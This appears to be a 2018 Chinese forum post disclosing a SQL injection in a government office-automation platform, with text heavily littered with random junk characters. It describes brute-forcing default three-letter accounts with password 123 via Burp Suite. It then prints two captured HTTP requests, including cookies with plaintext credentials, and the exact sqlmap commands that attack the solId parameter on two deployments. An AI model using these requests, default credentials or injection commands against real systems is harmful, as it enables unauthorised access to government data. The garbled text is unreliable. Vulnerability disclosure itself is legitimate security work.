|
' h& D3 K6 j' E3 K( W. P( b j
2 [$ s3 r- ~: r/ ^& M1 J
! }/ K; t/ _) }% O. K, r2 Q! K! z7 y. ]* Y, | H# {) S" Z
平台简介:
( v* M4 C* B# o! m* J. H 2 D9 q9 D$ V, x% M, `6 }
* g1 S4 f$ k) [$ `4 E4 S / p2 F6 e: q# l8 O3 Q
# D5 P7 `4 }: t) N: }' o
: l% o" Z: ~' C" R- W$ U
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
- ^" s- E4 [+ U+ Y
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
1 _# V+ B; d) [9 N( y同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!' @+ K, i( N5 a, |
* |4 Y( ?, q; n' Q7 S3 K: o3 v: q8 L; }" `. \- l
3 j, T/ @3 u/ }1 o; m7 X 8 [ D' T6 r( r( V J5 T: N! A) u
4 o. k! [7 Z1 a 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
1 c5 i0 `3 L1 d. T
3 a, t/ c! M; n& v6 h" t: b$ j9 Q( l; O* |) ^2 _7 }3 x
: d( w6 D+ n2 ^* S/ X
* b# W) J0 x% ~, [) z% z4 U: F, `* S7 F+ D! {1 ^/ b- G
http://1.1.1.1:7197/cap-aco/#(案例2-)4 E$ f8 v4 V0 z3 G
4 ^- ?% p1 w! b# ]- w2 S9 V: g8 }+ T7 x0 H, d
7 i3 L4 m- v# g2 N" O9 Y/ P8 A
http://www.XXOO.com (案例1-官网网站)9 J( ?' q5 q/ i- X
- y& Q$ l% Y6 H" X
' o5 d# {& D4 s+ ~
2 a% k& ^. A, l. H, m6 c
. U% F, z: ?$ p0 |8 b
+ J$ g6 h+ b: B5 ~* z h 漏洞详情:
% m* ~* t7 o6 o, c, j) E- y
7 k. L+ u6 e, t) q- `1 n
- C( ]: w; `: V$ V 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试2 q8 M( Q {! E0 x+ [# ^( s
& {: z0 q& E6 N4 H# s- [6 [1 M
- k! U0 c) Q% ]7 t 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:1 D6 p/ e5 E. W
$ d& R$ {. S* x* ^
. P4 K, r& u0 u7 ]. E' y ; x% C1 G% g @7 f7 p. q
+ Z& a. j# [" M7 r* r- M
) U" C8 C6 n6 n1 [3 I2 M  , M, j; u( x# g& N. n2 X
# f# q, s) y; F9 k# z, F! j9 V/ U6 g3 k# d
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:% ]! F5 d) ] q- [! m) H
6 P5 T) U" r' R2 R2 u4 [6 I5 Q
( ?9 _9 v4 N' e3 N4 g
1、案例1-官方网站/ b. g* e, H7 A+ B
( I1 B# P' f0 m4 Z; n" b6 J- y
) U0 G" S0 f% A7 n( u; p
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1* Q; [1 ]$ z, L; q
: f: D* e& W: E/ w, c7 x, c! ~2 i9 ~: Q" l% H2 S0 o
Host: www.XXOO.com0 n$ Q7 {( t' r5 j+ Z! Y p
9 k$ x1 N$ V6 g. \
* q7 Z% z6 j1 M( ]# y* E
Proxy-Connection: Keep-Alive
6 C. Y. p& {- L2 ]9 G2 o
- p9 [( \0 c" ]$ q6 G% b1 q* X8 q
Accept: application/json, text/javascript, */*; q=0.01) z% |9 w. P9 w8 a
1 d0 G& A: u- C3 @2 f; {8 a! q# V
Accept-Language: zh-CN; V7 U) S# B/ Z% ?5 F
1 q2 @! `! H6 Y7 h# m
9 T9 r; l3 `1 ]3 X' o
Content-Type: application/json
. z; o( E% J% {* T2 u/ S& @. i * `) l* x- {2 A3 F. |2 D
. t6 ?7 r7 p3 U5 l) S, F User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
" c$ N* x1 p& R- t& o ) _% K1 `$ L' Y/ V4 J9 V/ f2 U( a
+ C6 D' |* s: t% x1 e: L: p: Y
X-Requested-With: XMLHttpRequest8 \& q) J7 y# b9 Y0 T( H l
6 n9 g7 I5 n+ @2 ^: q }
3 D0 G) D% h$ ?( e Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
9 `2 y3 r* G: P3 [% _3 G
- ]3 o7 e# \( [% H; R, ?0 P3 j* U+ u3 d& \
Accept-Encoding: gzip, deflate, sdch
9 ?5 W. z( K5 v) U2 }4 Q / D: O$ z) o4 s6 w: `. c8 n4 ]4 @
* j5 L4 o, Y+ O+ o) k( I7 `
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
% R v9 B, w* f7 u; |6 e
$ S, ]6 b% Y. f2 {0 n. }; j5 k& c: j
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:% s) B/ W/ z2 [
9 y/ _' P/ n8 B7 Q' H
2 `8 W8 e% K1 z& X2 I+ ]5 F) p" \  3 z- z w. \2 `
( [& M) X# c3 H! p/ [1 E9 g. m/ e9 r, }3 ?
, M! s, c4 G: S
' z/ u8 \- e! G: e* c3 a/ a
4 m9 {. b! r; O v* V9 B( f 1 y7 P6 G, V9 O( [
& a8 p% L! }( m! e0 ~- V( K0 \9 Y7 n
/ C1 ?, _' J4 i$ I
* n7 {% i7 o( W3 s# l
2 V6 [) J6 G1 u5 b( Y9 g
" | u3 i6 b1 u! }0 o" c
; {) p5 _9 Q% A7 Q
2 s) m. T3 O( O( b- Q! t8 e' A" o
2、案例2-某天河云平台
u! m8 n/ I' @6 U( J
+ o) l0 K' `3 f9 @7 ]& V) \
1 R1 x/ U' `, ?- K/ V GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
' H% C7 s- O8 N$ O l9 i/ X
5 ?+ }, f. s- Q. o' r6 h& A* I4 q' z, [) |, | p0 B3 b
Host: 1.1.1.:7197. x8 Z: y3 H+ |+ C/ p9 I& u
& x0 c: X4 i8 f0 X0 ~; ]& o
Y# X3 y$ U1 V2 x6 d Accept: application/json, text/javascript, */*; q=0.01
z2 K5 O l* f9 H$ @0 X, O \, ] 1 I' a7 u8 {9 W& J% c/ j0 I; F
/ g# j/ i! M1 q: j X-Requested-With: XMLHttpRequest& w) f4 a1 T9 m
' O7 T. _9 S" K
# V( o. n, U+ m
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
r9 ~: U' Z/ P
% D" R* h; h( A" T& W& O& [$ x8 b) C' U
Content-Type: application/json0 I- O* r7 G+ y- B
& L2 l6 b! w0 r( A: }6 c
" Q+ u. b4 b9 H; z: R9 j5 H
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10083 X w4 `, T0 A! q
" T1 d& o9 W# l
. t( ?, t6 v+ K
Accept-Language: zh-CN,zh;q=0.8
' M# B0 p k$ v/ Z2 U% I+ [/ `% B& l 9 R' A1 a2 S% n" s7 S9 C. K
- W5 z! V9 k: U& G" s3 `( G O Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1) a7 G& S6 X5 {, t- `7 l5 f! Q
4 d7 M/ ?6 t, }. w$ b" x, n5 K
Connection: close
% a$ D; Z) z$ x8 } D3 C) r" Q6 [9 d - K7 [5 j, X! Y) b! A
# r4 K. {* u4 e) p/ K' S6 A( n9 Q 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
4 m3 u, V9 Q) J$ M! K0 L0 f ) N% q$ A: p+ h. r- A* }
, l6 ^; k8 u" y: U( f6 h2 Q 
8 l! c4 {* {4 Y 9 @5 P8 E+ Z9 [( f" |9 g
9 K1 K1 U% W: B* j& G: C9 ~
( ]# Y+ s- [( w3 d | 
发表于 2018-10-20 20:15:17
收藏
支持
反对